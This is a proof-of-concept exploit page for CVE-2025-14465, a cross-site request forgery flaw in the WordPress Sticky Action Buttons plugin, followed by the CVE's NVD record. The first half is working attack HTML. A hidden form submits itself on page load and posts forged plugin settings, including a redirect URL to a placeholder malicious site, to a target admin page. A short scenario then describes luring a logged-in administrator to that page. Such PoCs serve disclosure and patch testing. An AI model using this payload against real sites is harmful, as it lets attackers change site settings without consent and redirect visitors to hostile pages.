CVE-2025-14465

<!-- CSRF PoC for CVE-2025-14465 --> <!-- This PoC demonstrates how an attacker can forge a request to modify plugin settings --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-14465</title> </head> <body> <h1>CVE-2025-14465 CSRF PoC</h1> <p>Sticky Action Buttons Plugin Settings Modification</p> <!-- Auto-submit form that forges admin settings update request --> <form id="csrfForm" action="http://target-wordpress-site/wp-admin/admin.php?page=sticky-action-buttons" method="POST" style="display:none;"> <!-- Forged plugin settings --> <input type="hidden" name="sabs_enabled" value="1"> <input type="hidden" name="sabs_button_text" value="Malicious Button"> <input type="hidden" name="sabs_button_url" value="https://malicious-site.com"> <input type="hidden" name="sabs_position" value="bottom-right"> <input type="hidden" name="sabs_options_page_form_submit" value="1"> <!-- Missing or bypassed nonce validation --> </form> <script> // Auto-submit on page load document.getElementById('csrfForm').submit(); // Alternative: Trigger on click // document.addEventListener('click', function() { // document.getElementById('csrfForm').submit(); // }); </script> <p>If you see this message, the form has been submitted.</p> </body> </html> <!-- Attack Scenario: 1. Attacker creates a malicious page containing the above PoC 2. Lures a logged-in WordPress admin to visit the page or click a link 3. Browser automatically submits the forged request to the target site 4. Plugin settings are modified without admin's consent 5. Attacker may redirect users to malicious sites or disrupt site functionality -->

{"cve": {"id": "CVE-2025-14465", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:55.057", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Sticky Action Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the sabs_options_page_form_submit() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Sticky Action Buttons para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta e incluyendo la 1.1. Esto se debe a la validación de nonce faltante o incorrecta en la función sabs_options_page_form_submit(). Esto hace posible que atacantes no autenticados actualicen la configuración del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/sticky-action-buttons/tags/1.0/sticky-action-buttons.php#L105", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/82b243c7-5b58-4765-9083-4660c0b479cc?source=cve", "source": "[email protected]"}]}}